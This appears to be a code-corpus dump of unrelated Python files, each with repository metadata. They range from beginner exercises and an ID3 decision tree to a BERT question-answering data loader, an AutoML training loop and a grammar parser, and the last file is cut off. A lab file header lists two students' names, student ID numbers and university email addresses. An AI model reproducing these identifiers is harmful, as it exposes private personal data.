fcdaa2322c1048ba6a877e58eab28797253f630d | Python | cbrandao18/python-practice | /common-characters.py | UTF-8 | 447 | 4.125 | 4 | [] | no_license | string1 = raw_input("Input your first string: ")
# Read the second string to compare (Python 2 raw_input).
string2 = raw_input("Input your second string: ")
def get_common_chars(string1, string2):
    """Return the characters of string1 that also appear in string2.

    Characters are returned in their first-appearance order in string1,
    without duplicates.
    """
    common_chars = []
    for ch in string1:
        # Idiomatic for-loop replaces the original index-based while loop.
        if ch in string2 and ch not in common_chars:
            common_chars.append(ch)
    return common_chars
# Print the list of shared characters (Python 2 print statement).
print get_common_chars(string1,string2)
| true |
def factorial(num):
    """Return num! computed by simple recursion (num: non-negative int)."""
    if num in (0, 1):
        return 1
    return num * factorial(num - 1)
def fibonacci(num):
    """Return the num-th Fibonacci number (1, 1, 2, 3, 5, ...) recursively."""
    if num in (0, 1):
        return 1
    return fibonacci(num - 1) + fibonacci(num - 2)
#print factorial(10)
#print fibonacci(4)
# Print the first 10 Fibonacci numbers (Python 2 print statement).
for x in range(0, 10):
    print fibonacci(x)
c691267a92d3c6107ae8ad0142e441ae1d7949a5 | Python | sirlancer/ml_demos | /decision_tree/trees.py | UTF-8 | 3,280 | 3.015625 | 3 | [] | no_license | __author__ = 'lancer'
import operator
import numpy as np
from collections import defaultdict
# Calculate Shannon entropy
def calcShannonEnt(dataSet):
    """Return the Shannon entropy of the class labels (last column of each row)."""
    total = len(dataSet)
    counts = defaultdict(int)
    for record in dataSet:
        counts[record[-1]] += 1
    entropy = 0.0
    for count in counts.values():
        p = float(count) / total
        entropy -= p * np.log2(p)
    return entropy
# Produce some data
def createDataSet():
    """Return a small toy dataset (fish classification) and its feature names."""
    feaNames = ['no surfacing', 'flippers']
    dataSet = [
        [1, 1, 'yes'],
        [1, 1, 'yes'],
        [1, 0, 'no'],
        [0, 1, 'no'],
        [0, 1, 'no'],
    ]
    return dataSet, feaNames
# Filter dataSet to rows whose featureDim-th feature equals value, dropping that feature
def splitDataSet(dataSet, featureDim, value):
    """Return matching rows with the featureDim-th column removed."""
    return [row[:featureDim] + row[featureDim + 1:]
            for row in dataSet if row[featureDim] == value]
# Select the split feature with the highest information gain
def chooseBestFeatureToSplit(dataSet):
    """Return the feature index with the largest information gain (-1 if no gain > 0)."""
    numFeatures = len(dataSet[0]) - 1
    baseEntropy = calcShannonEnt(dataSet)
    bestFeature = -1
    bestInfoGain = 0.0
    for dim in range(numFeatures):
        uniqueValues = set(row[dim] for row in dataSet)
        conditionalEntropy = 0.0
        for value in uniqueValues:
            subset = splitDataSet(dataSet, dim, value)
            weight = float(len(subset)) / len(dataSet)
            conditionalEntropy += weight * calcShannonEnt(subset)
        infoGain = baseEntropy - conditionalEntropy
        if infoGain > bestInfoGain:  # strict '>' keeps the earliest best feature
            bestInfoGain = infoGain
            bestFeature = dim
    return bestFeature
# Break ties in leaf nodes by majority vote over the labels
def majorityCnt(labelList):
    """Return the most frequent label in labelList.

    BUG FIX: the original passed ``reversed=True`` to sorted(), which is not
    a valid keyword argument (the parameter is ``reverse``), so every call
    raised TypeError.
    """
    labelCount = defaultdict(int)
    for label in labelList:
        labelCount[label] += 1
    # sort descending by count; first item is the majority label
    sortedLabelCount = sorted(labelCount.items(), key=operator.itemgetter(1), reverse=True)
    return sortedLabelCount[0][0]
# Recursively build the decision tree as nested dicts {featureName: {value: subtree-or-label}}
def createTree(dataSet, labels):
    """Build an ID3 decision tree.

    NOTE: mutates `labels` in place (the del below), so callers must pass a
    copy if they still need the full feature-name list afterwards.
    """
    labelList = [ row[-1] for row in dataSet ]
    # All the labels are the same: this branch is pure, return the class label
    if labelList.count(labelList[0]) == len(labelList):
        return labelList[0]
    # Every feature has been consumed: fall back to a majority vote
    if len(dataSet[0]) == 1:
        return majorityCnt(labelList)
    feaDim = chooseBestFeatureToSplit(dataSet)
    bestFeature = labels[feaDim]
    myTree = {bestFeature:{}}
    del(labels[feaDim])
    feaValues = [ row[feaDim] for row in dataSet]
    uniqueFeaValues = set(feaValues)
    for value in uniqueFeaValues:
        subLabels = labels[:]  # copy so sibling branches see an intact label list
        myTree[bestFeature][value] = createTree(splitDataSet(dataSet, feaDim, value), subLabels)
    return myTree
if __name__ == '__main__':
    # Demo: build and print the decision tree for the toy data set
    data, feaNames = createDataSet()
    print('data:%s' % data)
    # shannonEnt = calcShannonEnt(data)
    # print('shannonEnt:%f' % shannonEnt)
    # print(splitDataSet(data, 0, 1))
    # print(splitDataSet(data, 0, 0))
    # bestFeatureDim = chooseBestFeatureToSplit(data)
    # print('best feature dimension:%d' % bestFeatureDim)
    myTree = createTree(data, feaNames)
    print(myTree)
| true |
f5df81fe6f3b6ded7aad718be5fba061689dcc6c | Python | laithadi/School-Work---Python | /Adix5190_l4/t13.py | UTF-8 | 340 | 3.640625 | 4 | [] | no_license | '''
Lab 4, Task 13
Author: Laith Adi & Ashwin Balaje
ID: 170265190 & 180790110
Email: Adix5190@mylaurier.ca & bala0110@mylaurier.ca
__updated__ = "2018-10-04"
'''
fac_int = int(input('Enter an integer: '))
# Factors from fac_int down to 2; the trailing "1" is appended in the output line.
factors = list(range(fac_int, 1, -1))
answer = 1
for k in factors:
    answer *= k
# Render e.g. "5! = 5 * 4 * 3 * 2 * 1 = 120" as a single line.
expansion = ''.join('{} * '.format(k) for k in factors)
print('{}! = {}1 = {}'.format(fac_int, expansion, answer))
e078fcc42a06219a5dbe727b5a089c34575d9e53 | Python | ShaneSaww/PathfinderTableRoller | /Pathfinder.py | UTF-8 | 4,312 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env python
#############################################
# Pathfinder.py a program that reads input from a text file and rolls on it.
# This program is created to help test random race creation/ revive lists. This list can have many rolling tables that call other rolling tables.
# More details on the FF exist in the FF.
#Created by: Shane
#
#Future Goals: Some sort of UI, better error handling.
#############################################
import random
import os
import collections
def PickTable(opt, chance):
    """Roll a d100 and pick an entry from a weighted table.

    opt    : the possible results, in table order.
    chance : cumulative upper bounds per result, e.g. opt = HUMAN, DWARF,
             HALFLING with chance = 50, 75, 100 gives Human on 1-50,
             Dwarf on 51-75 and Halfling on 76-100.
    A roll of 100 is clamped to 99 before matching. Returns None when no
    bound covers the roll.
    NOTE(review): call sites pass (tablechance[i], tableopt[i]) -- the result
    strings arrive in `opt` and the numeric bounds in `chance`, which matches
    this function despite the confusingly swapped list names elsewhere.
    """
    roll = random.randint(1, 100)
    if roll == 100:
        roll = 99
    for index, entry in enumerate(opt):
        if roll <= chance[index]:
            return entry
## DEFINE VARIABLES
raceopt = []        # chance thresholds for the table currently being read
racechance = []     # result values for the table currently being read
tablelist = []      # table names, in the order they appear in the flat file
tableopt = []       # per-table threshold lists (parallel to tablelist)
tablechance = []    # per-table value lists (parallel to tablelist)
tablepick = " "     # sentinel: a single space means "no roll made yet"
racewinner = []
rolls = 0
racecount = []
flagg = 0           # becomes 1 once the first (roll-count) line has been read
## Open the flat file for input and another file for output.
## NOTE(review): no error handling if either path is missing or unwritable.
f = open('C:/pyt/RollInput.txt')
fw = open('C:/pyt/RollOutput.txt', 'w')
for line in f:
    if line[0] == '#': ## Skip commented lines in the flat file
        continue
    if flagg == 0:
        rolls = int(line) ## The first line in the file is how many times to roll on the table(s)
        flagg = 1 ## done with first line, NEVER COME BACK
        continue
    line = line.rstrip('\n') ## Remove the trailing newline character
    if line == '--New Table':
        continue ## nothing to do at a table start
    elif line == '--End Table':
        # End of a table: store the accumulated thresholds/values so tables
        # can be rolled on later regardless of their order in the file.
        tableopt.append(raceopt)
        tablechance.append(racechance)
        raceopt = []
        racechance = []
    else:
        if not line[0].isdigit():
            ## A line without a leading digit is a table name.
            tablelist.append(line)
        else:
            ## "NN value" line: first two chars are the threshold, the rest the value.
            raceopt.append(int(line[:2]))
            racechance.append(line[3:])
## Pick one final value per requested roll; `rolls` came from the flat file.
for _ in range(0, rolls):
    ## Walk the tables, following any result that names another table.
    for x, table in enumerate(tablelist):
        if tablepick == ' ':
            ## First time in here: roll on the top-most/first table.
            tablepick = PickTable(tablechance[x], tableopt[x])
        elif tablepick in tablelist:
            ## The previous result names another table; find it and roll on it.
            i = tablelist.index(tablepick)
            tablepick = PickTable(tablechance[i], tableopt[i])
        else:
            ## The result is a final value; nothing more to resolve.
            continue
    # Store the winner, then reset the sentinel for the next roll.
    racewinner.append(tablepick)
    tablepick = ' '
## Count how many times each result won and what percentage that is.
raceset = set(racewinner)
for qk in raceset:
    racecount.append(str(qk +" was rolled " + str(racewinner.count(qk)) + " times Which is a " + str((racewinner.count(qk)/rolls)*100) +"% "))
for qk in racecount:
    fw.write(str(qk) + str())
    fw.write("\n")
fw.write("-----------------------------------------------------------\n")
for ele in racewinner:
    fw.write(ele + "\n")
## Close both files.
## BUG FIX: the original lines read `f.close` / `fw.close`, which merely
## reference the bound method without calling it, so neither file was ever
## closed and output could remain unflushed.
f.close()
fw.close()
| true |
065399bd7cafec5bccc9e0d576ca868be50186a2 | Python | sarahclarke-skc/week_03-day_3-flask_lab | /models/order.py | UTF-8 | 345 | 3.21875 | 3 | [] | no_license | class Order:
def __init__(self, customer_name, order_date, book, total_cost):
self.customer_name = customer_name
self.order_date = order_date
self.book = book
self.total_cost = total_cost
def pence_to_pounds(self):
corrected_format = self.total_cost / 100
return f"{corrected_format:.2f}" | true |
05cdf9da96c996f20df73d5eba4fbc434082bb77 | Python | geneRocket/albert_bidaf | /data.py | UTF-8 | 7,403 | 2.640625 | 3 | [] | no_license | import json, os
import random
import torch
def load_data(filename):
    """Load SQuAD-style QA examples from *filename*.

    Returns a shuffled list of [id, context, question, [answer_text, ...]]
    entries taken from data[0]['paragraphs'].

    FIX: the original ``json.load(open(filename))`` leaked the file handle;
    a ``with`` block now guarantees it is closed.
    """
    with open(filename) as fh:
        paragraphs = json.load(fh)['data'][0]['paragraphs']
    D = []
    for d in paragraphs:
        for qa in d['qas']:
            D.append([
                qa['id'], d['context'], qa['question'],
                [a['text'] for a in qa.get('answers', [])]
            ])
    random.shuffle(D)
    return D
def search(pattern, sequence):
    """Return the first index where *pattern* occurs as a contiguous
    subsequence of *sequence*, or -1 if it never occurs."""
    size = len(pattern)
    for start in range(len(sequence)):
        if sequence[start:start + size] == pattern:
            return start
    return -1
class DataGenerator():
    """Batches QA examples into padded (context, question) tensor dicts.

    batchIter yields training batches with answer-span targets;
    batchIterNoAnswer yields inference batches without targets.
    """
    def __init__(self,json_path,tokenizer,device):
        # load_data shuffles the examples once up front
        self.train_data = load_data(json_path)
        print(len(self.train_data))
        self.tokenizer=tokenizer
        self.device=device
    def batchIter(self,batch_size):
        """Yield training batches; examples whose answer cannot be found in
        the (possibly truncated) context are skipped."""
        batch_p=[]
        batch_q=[]
        batch_start=[] # index of the answer's first token within the context
        batch_end=[]
        batch_context_len=[]
        batch_question_len=[]
        batch_ans_ids=[]
        batch_answers=[]
        for cnt,(id,context,question,answers) in enumerate(self.train_data):
            max_len=240
            if(len(context)>max_len):
                context=context[:max_len]
            context_ids=self.tokenizer.encode(context)[1:-1]  # strip [CLS]/[SEP]
            question_ids=self.tokenizer.encode(question)[1:-1]
            answer=random.choice(answers)
            ans_ids = self.tokenizer.encode(answer)[1:-1]
            has_answer = search(ans_ids, context_ids)
            if has_answer == -1:
                continue  # answer not present after truncation: drop the example
            batch_p.append(context)
            batch_q.append(question)
            batch_ans_ids.append(ans_ids)
            batch_answers.append(answer)
            batch_context_len.append(len(context_ids))
            batch_question_len.append(len(question_ids))
            if len(batch_p)>=batch_size or cnt==len(self.train_data)-1:
                ret=self.tokenizer.batch_encode_plus(zip(batch_p,batch_q),pad_to_max_length=True)
                batch_pair_ids=ret['input_ids']
                batch_token_type_ids=ret['token_type_ids']
                batch_attention_mask=ret['attention_mask']
                for i in range(len(batch_pair_ids)):
                    # pairs are [CLS] para [SEP] ques [SEP]; para and ques are
                    # split apart later, so the span is expressed relative to para
                    start_idx=search(batch_ans_ids[i], batch_pair_ids[i])-1
                    batch_start.append(start_idx)
                    batch_end.append(start_idx+len(batch_ans_ids[i])-1)
                batch_pair_ids = torch.tensor(batch_pair_ids).to(self.device)
                batch_token_type_ids = torch.tensor(batch_token_type_ids).to(self.device)
                batch_attention_mask = torch.tensor(batch_attention_mask).to(self.device)
                batch_start = torch.tensor(batch_start).to(self.device)
                batch_end = torch.tensor(batch_end).to(self.device)
                yield {
                    "batch_pair_ids": batch_pair_ids,
                    "batch_token_type_ids": batch_token_type_ids,
                    "batch_attention_mask": batch_attention_mask,
                    "batch_start": batch_start,
                    "batch_end": batch_end,
                    "batch_context_len":batch_context_len,
                    "batch_question_len":batch_question_len,
                    "batch_answers":batch_answers,
                    "batch_p":batch_p,
                }
                batch_p=[]
                batch_q=[]
                batch_start=[]
                batch_end=[]
                batch_context_len=[]
                batch_question_len=[]
                batch_ans_ids=[]
                batch_answers=[]
    def batchIterNoAnswer(self, batch_size,ignore_id=None):
        """Yield inference batches, skipping example ids contained in ignore_id.

        BUG FIX: the default used to be the mutable ``ignore_id=set()``, which
        Python shares across every call; a None sentinel avoids that pitfall
        while keeping the call signature backward compatible.
        """
        if ignore_id is None:
            ignore_id = set()
        batch_id=[]
        batch_p=[]
        batch_q=[]
        batch_context_ids=[]
        batch_context_len=[]
        batch_question_len=[]
        for cnt,(id,context,question,_) in enumerate(self.train_data):
            if(id in ignore_id):
                continue
            max_len=240
            if(len(context)>max_len):
                context=context[:max_len]
            context_ids=self.tokenizer.encode(context)[1:-1]
            question_ids=self.tokenizer.encode(question)[1:-1]
            batch_id.append(id)
            batch_p.append(context)
            batch_q.append(question)
            batch_context_len.append(len(context_ids))
            batch_question_len.append(len(question_ids))
            batch_context_ids.append(context_ids)
            if len(batch_p)>=batch_size or cnt==len(self.train_data)-1:
                ret=self.tokenizer.batch_encode_plus(zip(batch_p,batch_q),pad_to_max_length=True)
                batch_pair_ids=ret['input_ids']
                batch_token_type_ids=ret['token_type_ids']
                batch_attention_mask=ret['attention_mask']
                batch_pair_ids = torch.tensor(batch_pair_ids).to(self.device)
                batch_token_type_ids = torch.tensor(batch_token_type_ids).to(self.device)
                batch_attention_mask = torch.tensor(batch_attention_mask).to(self.device)
                yield {
                    "batch_id":batch_id,
                    "batch_pair_ids": batch_pair_ids,
                    "batch_token_type_ids": batch_token_type_ids,
                    "batch_attention_mask": batch_attention_mask,
                    "batch_context_ids":batch_context_ids,
                    "batch_context_len":batch_context_len,
                    "batch_question_len":batch_question_len,
                    "batch_p":batch_p,
                }
                batch_p=[]
                batch_q=[]
                batch_id=[]
                batch_context_ids=[]
                batch_context_len=[]
                batch_question_len=[]
def test():
    """Manual smoke test: iterate both batch generators over the demo data and
    print any example whose decoded answer span disagrees with the gold answer.
    Requires the third-party `transformers` package and the demo JSON file.
    """
    from transformers import BertTokenizer
    import torch
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    pretrained = 'albert_chinese_tiny'
    tokenizer = BertTokenizer.from_pretrained(pretrained)
    data_gen=DataGenerator("../data/demo/demo_train.json",tokenizer,device)
    for batch in data_gen.batchIter(2):
        batch_start=batch["batch_start"]
        batch_end=batch["batch_end"]
        batch_pair_ids=batch["batch_pair_ids"]
        batch_answers=batch["batch_answers"]
        batch_p=batch["batch_p"]
        for i in range(len(batch_start)):
            start=batch_start[i].item()
            end=batch_end[i].item()
            # +1 shifts back past [CLS]; slice end is inclusive, hence end+1+1
            decode_answer=tokenizer.decode(batch_pair_ids[i][start+1:end+1+1]).replace(" ","")
            if(decode_answer!=batch_answers[i]):
                print(batch_answers[i])
                print(decode_answer)
                print("===========")
        print("************************")
    for batch in data_gen.batchIterNoAnswer(2):
        batch_pair_ids=batch["batch_pair_ids"]
        batch_token_type_ids=batch["batch_token_type_ids"]
        batch_p=batch["batch_p"]
        batch_context_ids=batch["batch_context_ids"]
        for i in range(len(batch_pair_ids)):
            print(tokenizer.decode(batch_pair_ids[i]))
            print(tokenizer.decode(batch_context_ids[i]))
            print("===============")
# Run the smoke test only when executed as a script.
if __name__ == "__main__":
    test()
| true |
0661dfd57d7799f6139fe616c970a90b4f5c4d5b | Python | TheCodeWizard27/MissionEuropa | /view.py | UTF-8 | 632 | 3.09375 | 3 | [] | no_license | from hitbox import Hitbox
from vector2d import Vector2D
# Viewport ("Sichtfeld") class
class View:
    """Horizontally scrolling viewport carrying a collision hitbox."""

    pos = None
    size = None
    hitbox = None

    # constructor: build the default view together with its hitbox
    def __init__(self):
        self.pos = Vector2D(0, 0)
        self.size = Vector2D(154, 50)
        self.hitbox = Hitbox(Vector2D(self.pos.x + 1, self.pos.y + 1),
                             Vector2D(self.size.x - 2, self.size.y - 1))

    # shift the view horizontally and drag the hitbox along with it
    def update(self, speed):
        self.pos.x += speed
        self.hitbox.update_pos(Vector2D(self.pos.x - 5, self.pos.y + 3))

    # drop all view data
    def delete(self):
        self.pos = None
        self.size = None
        self.hitbox = None
577b8d25275c0cd1fa03056619b322af3af08c1d | Python | RualPerez/AutoML | /training.py | UTF-8 | 2,641 | 2.890625 | 3 | [] | no_license | import torch
from childNet import ChildNet
from utils import fill_tensor, indexes_to_actions
from torch.autograd import Variable
def training(policy, batch_size, total_actions, verbose = False, num_episodes = 500, val_freq = 100):
    '''Optimization/training loop of the policy net. Returns the trained policy.

    policy        : policy network (must expose layer_limit, n_outputs, loss, optimizer)
    batch_size    : number of architectures sampled per episode
    total_actions : total number of available actions
    verbose       : print per-sample architectures and periodic summaries
    num_episodes  : number of training episodes
    val_freq      : episode interval of the verbose summary (new keyword with a
                    default, so the public signature stays backward compatible)
    '''
    # BUG FIX: the verbose summary at the bottom referenced the undefined
    # names `val_freq` and `np`, raising NameError whenever verbose=True.
    # `val_freq` is now a parameter and numpy is imported locally.
    import numpy as np

    # training settings
    decay = 0.9
    training = True  # sampling-mode flag passed to the policy's forward
    # childNet
    cn = ChildNet(policy.layer_limit)
    nb_epochs = 100
    # train policy network
    training_rewards, val_rewards, losses = [], [], []
    baseline = torch.zeros(15, dtype=torch.float)  # moving window of recent rewards
    print('start training')
    for i in range(num_episodes):
        if i % 100 == 0:
            print('Epoch {}'.format(i))
        rollout, batch_r, batch_a_probs = [], [], []
        # forward pass (no gradients needed while sampling architectures)
        with torch.no_grad():
            prob, actions = policy(training)
        batch_hid_units, batch_index_eos = indexes_to_actions(actions, batch_size, total_actions)
        # compute the reward of every sampled architecture individually
        for j in range(batch_size):
            if verbose:
                print(batch_hid_units[j])
            # cubing sharpens the reward signal
            r = cn.compute_reward(batch_hid_units[j], nb_epochs)**3
            if batch_hid_units[j] == ['EOS']:
                r -= -1  # NOTE(review): this *increases* r by 1; `r -= 1` may have been intended -- left unchanged
            a_probs = prob[j, :batch_index_eos[j] + 1]
            batch_r += [r]
            batch_a_probs += [a_probs.view(1, -1)]
        # rearrange the action probabilities into one padded tensor
        a_probs = []
        for b in range(batch_size):
            a_probs.append(fill_tensor(batch_a_probs[b], policy.n_outputs, ones=True))
        a_probs = torch.stack(a_probs, 0)
        # convert to pytorch tensors --> use get_variable from utils if training in GPU
        batch_a_probs = Variable(a_probs, requires_grad=True)
        batch_r = Variable(torch.tensor(batch_r), requires_grad=True)
        # classic training steps (REINFORCE with a moving-average baseline)
        loss = policy.loss(batch_a_probs, batch_r, torch.mean(baseline))
        policy.optimizer.zero_grad()
        loss.backward()
        policy.optimizer.step()
        # actualize baseline: exponential moving window over batch rewards
        baseline = torch.cat((baseline[1:]*decay, torch.tensor([torch.mean(batch_r)*(1-decay)], dtype=torch.float)))
        # bookkeeping
        training_rewards.append(torch.mean(batch_r).detach().numpy())
        losses.append(loss.item())
        # periodic progress report
        if verbose and (i+1) % val_freq == 0:
            print('{:4d}. mean training reward: {:6.2f}, mean loss: {:7.4f}'.format(i+1, np.mean(training_rewards[-val_freq:]), np.mean(losses[-val_freq:])))
    print('done training')
    return policy
03a6f137ef087066e805c6a0df59a54e2300cddf | Python | dabay/LeetCodePython | /263UglyNumber.py | UTF-8 | 1,397 | 3.921875 | 4 | [] | no_license | # -*- coding: utf8 -*-
'''
__author__ = 'dabay.wang@gmail.com'
263: Ugly Number
https://leetcode.com/problems/ugly-number/
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5.
For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
=== Comments by Dabay===
用几个遍历来记录是否还可能被2,3,5整除,减少模运算的次数。
'''
class Solution(object):
    """LeetCode 263: decide whether a number's only prime factors are 2, 3 and 5."""

    def isUgly(self, num):
        """
        :type num: int
        :rtype: bool

        Strip out every factor of 2, 3 and 5; num is ugly iff nothing remains.
        Uses floor division so the value stays an exact int under Python 3
        (the original ``num / 2`` produced floats there, losing exactness for
        very large inputs); the three-flag bookkeeping is gone as well.
        """
        if num <= 0:
            return False  # zero and negatives are never ugly
        for factor in (2, 3, 5):
            while num % factor == 0:
                num //= factor
        return num == 1
def main():
    """Smoke test: 14 has prime factor 7, so this prints False."""
    sol = Solution()
    print sol.isUgly(14)
if __name__ == "__main__":
import time
start = time.clock()
main()
print "%s sec" % (time.clock() - start) | true |
f7ad053e1b668729d0d2a6e669178f00ade6ff06 | Python | BrandonKates/AttEx | /flask-api/grammar.py | UTF-8 | 3,806 | 2.8125 | 3 | [] | no_license | import json
from lark import Lark, Transformer, v_args
from lark.lexer import Token
parser = Lark(r"""
start: _NL? production+
production: VAR "->" value_list _NL
value_list: value+ | value+ "|" value_list
value: VAR | VALUE | COORD
VAR: /[A-Z]/
VALUE: /[\w.?!\'-]{2,}|[a-z.?\'-]{1,}/+
COORD: /\([0-9], [0-9]\)/
%import common.NEWLINE -> _NL
%import common.WS_INLINE
%import common.LETTER
%ignore WS_INLINE
""")
@v_args(inline=True)
class CFGTokenTransformer(Transformer):
    """Transforms a parsed grammar into {VAR: [[Token, ...], ...]},
    keeping the raw lark Tokens of every alternative."""

    def value(self, value_token):
        """A value node wraps a single token; pass it through unchanged."""
        return value_token

    def value_list(self, *value_list):
        """Flatten the right-recursive alternative list into token groups."""
        flattened = []
        group = []
        for item in value_list:
            if type(item) == Token:   # plain token: part of the current alternative
                group.append(item)
            if type(item) == list:    # already-transformed tail of alternatives
                flattened.extend(item)
        flattened.append(group)
        return flattened

    def production(self, key, value):
        """Pair the left-hand-side VAR token with its alternatives."""
        return (key, value)

    def start(self, *sections):
        """Collect all productions into a dict keyed by their VAR token."""
        return {lhs: alternatives for lhs, alternatives in sections}
@v_args(inline=True)
class CFGStringTransformer(Transformer):
    """Like CFGTokenTransformer, but collapses each alternative's tokens
    into plain strings and keys the result by the VAR's string value."""

    def value(self, value_token):
        return value_token

    def value_list(self, *value_list):
        """Flatten the right-recursive alternative list into token groups."""
        flattened = []
        group = []
        for item in value_list:
            if type(item) == Token:
                group.append(item)
            if type(item) == list:
                flattened.extend(item)
        flattened.append(group)
        return flattened

    def production(self, key, value):
        """Post-process every alternative's token group into merged strings."""
        processed = [processOneValueList(group) for group in value]
        return (key, processed)

    def start(self, *sections):
        """Map each production's VAR *string* (not Token) to its alternatives."""
        return {lhs.value: alternatives for lhs, alternatives in sections}
def processOneValueList(value_list):
    """Collapse a token list into strings: consecutive VALUE tokens merge into
    one space-joined phrase, while each VAR/COORD token stands alone."""
    pieces = []
    buffer = []
    for token in value_list:
        if token.type == 'VALUE':
            buffer.append(token.value)
        elif token.type == 'VAR' or token.type == 'COORD':
            if buffer:
                pieces.append(' '.join(buffer))
                buffer = []
            pieces.append(token.value)
    if buffer:
        pieces.append(' '.join(buffer))
    return [piece.strip() for piece in pieces]
def parseGrammar(grammar):
    """Parse raw grammar text with the module-level lark parser; returns a parse tree."""
    return parser.parse(grammar)
def parseGrammarToString(grammar):
    """Parse the grammar and transform it into {var: [[str, ...], ...]} with merged phrase strings."""
    r = parseGrammar(grammar)
    return CFGStringTransformer().transform(r)
def parseGrammarToTokens(grammar):
    """Parse the grammar and transform it into {VarToken: [[Token, ...], ...]} keeping raw lark Tokens."""
    r = parseGrammar(grammar)
    return CFGTokenTransformer().transform(r)
'''
For example we might just want to pass a single 'S' tag, up to 3 'Q' tags or just give more information about the productions and rules
'''
def custom_rules(rules):
    """Placeholder for rule-based grammar construction; not implemented, always returns None."""
    return None
def getGrammarJSON(grammar):
    """Parse the grammar text and serialize its string-transformed form as JSON."""
    return json.dumps(parseGrammarToString(grammar))
if __name__ == "__main__":
grammar = '''S -> is this C ? Y | how is C different from C ? C specializes C because A | how is C different from C ? C is like C except that A | if not C what is it ? C | i don't know what P is ? P is located at L in I | i don't know what R is ? R is M in I than I | i don't know what B is ? B is H in I .
C -> deer | bear | dog | cat | panda .
A -> Q and A | Q .
Q -> it is M R | it is B | it has N O | its P is M R | its P is B .
M -> more | less .
R -> small | furry | long | thin | chubby .
B -> black | brown | red | white .
N -> no | .
O -> Ps | P .
P -> eye | leg | horn | snout | eye-spot .
Y -> yes | no .
L -> (0, 0) .
I -> imagejpeg | image2jpeg .
H -> present | absent .
'''
print(getGrammarJSON(grammar))
print(parseGrammarToTokens(grammar))
# REGEX: [\w|.!?'-]{2,}|\.|\?|[a-z]{1}|\([0-9], [0-9]\) | true |
804f925366c8a1f90b137b8b66e0200b5af4a9a8 | Python | charliegriffin/GraduateUnschool | /mySolutions/6.01SCs2011/swLab02/2.1.4CommentsMachine.py | UTF-8 | 1,474 | 3.140625 | 3 | [] | no_license | import lib601.sm as sm
class CommentsSM(sm.SM): # This works just like the turnstyle in 2.1.2
    """State machine that outputs the characters of '#' comments and None otherwise."""
    startState = 'off'

    def getNextValues(self, state, inp):
        """Return (next_state, output): '#' switches the machine on, newline off."""
        if state == 'off':
            if inp == '#':
                return ('on', inp)    # comment begins: start emitting characters
            return ('off', None)      # outside a comment: emit nothing
        if state == "on":
            if inp == '\n':
                return ('off', None)  # newline terminates the comment
            return ('on', inp)        # still inside the comment: emit the character
def runTestsComm():
    """Exercise CommentsSM on the sample inputs and print the filtered outputs.

    NOTE(review): relies on x1 and x2 being defined elsewhere (presumably
    sample strings from the lab harness); they are not defined in this file,
    so calling this as-is raises NameError -- TODO confirm.
    """
    m = CommentsSM()
    # Return only the outputs that are not None
    print 'Test1:', [c for c in CommentsSM().transduce(x1) if not c==None]
    print 'Test2:', [c for c in CommentsSM().transduce(x2) if not c==None]
    # Test that self.state is not being changed.
    m = CommentsSM()
    m.start()
    [m.getNextValues(m.state, i) for i in ' #foo #bar']
    print 'Test3:', [c for c in [m.step(i) for i in x2] if not c==None]
# Run the self-tests at import time; the expected output is listed below.
# execute runTestsComm() to carry out the testing, you should get:
runTestsComm()
#Test1: ['#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
#Test2: ['#', 'i', 'n', 'i', 't', 'i', 'a', 'l', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't', '#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
#Test3: ['#', 'i', 'n', 'i', 't', 'i', 'a', 'l', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't', '#', ' ', 'f', 'u', 'n', 'c', '#', ' ', 't', 'e', 's', 't', '#', ' ', 'c', 'o', 'm', 'm', 'e', 'n', 't']
################################## | true
07f807e713460039b40e6c5b12e7aa7cb265394f | Python | lvah/201903python | /day05/code/10_with语句.py | UTF-8 | 481 | 3.453125 | 3 | [] | no_license | """
with语句工作原理:
python中的with语句使用于对资源进行访问的场合,
保证不管处理过程中是否发生错误或者异常都会自动
执行规定的(“清理”)操作,释放被访问的资源,
比如有文件读写后自动关闭、线程中锁的自动获取和释放等。
"""
# Inside the with-block the file object is open (f.closed is False);
# read the first 10 characters to demonstrate access to the resource.
with open('doc/passwd') as f:
    print("with语句里面:", f.closed)
    print(f.read(10))
# After the with-block exits, the file has been closed automatically.
print("with语句外面:", f.closed)
a8f3e282154330f27332193291a81984520c3341 | Python | diana134/afs | /Code/pieceWidget.py | UTF-8 | 4,715 | 2.8125 | 3 | [] | no_license | """The widget for adding a Selection to an Entry"""
import sys
import os.path
sys.path.insert(0, os.path.join("..", "Forms"))
from PyQt4.QtGui import QWidget
from PyQt4.QtCore import QTime
from ui_pieceWidget import Ui_PieceWidget
from utilities import sanitize
class PieceWidget(QWidget):
    """Widget for adding a performance piece (Selection) to an Entry.

    Which fields are editable depends on the currently selected discipline.
    """

    def __init__(self, parent=None, piece=None):
        """Build the UI, default the layout to Dance, and prefill from *piece* if given."""
        super(PieceWidget, self).__init__(parent)
        self.ui = Ui_PieceWidget()
        self.ui.setupUi(self)
        self.dance()  # Slightly cheater way to start the ui properly
        # Discipline name -> field-configuration method (Pythonic switch-case)
        self.disciplines = {
            'Dance': self.dance,
            'Piano': self.piano,
            'Choral': self.choral,
            'Vocal': self.vocal,
            'Instrumental': self.instrumental,
            'Band': self.band,
            'Speech': self.speech,
        }
        if piece is not None:
            self.ui.titleLineEdit.setText(piece['title'])
            self.ui.titleOfMusicalLineEdit.setText(piece['titleOfMusical'])
            self.ui.composerLineEdit.setText(piece['composerArranger'])
            time = piece['performanceTime']
            if len(piece['performanceTime']) < 5:
                time = '0' + time  # pad with a leading 0 so "m:ss" parses as "mm:ss"
            self.ui.performanceTimeEdit.setTime(QTime.fromString(time, "mm:ss"))

    def clearFields(self):
        """Clears and resets all input fields."""
        for line_edit in (self.ui.titleLineEdit,
                          self.ui.titleOfMusicalLineEdit,
                          self.ui.composerLineEdit):
            line_edit.clear()
        self.ui.performanceTimeEdit.setTime(QTime(0, 0, 0))

    def getFields(self):
        """Return a dictionary of all the fields, stripped and sanitized."""
        fields = {}
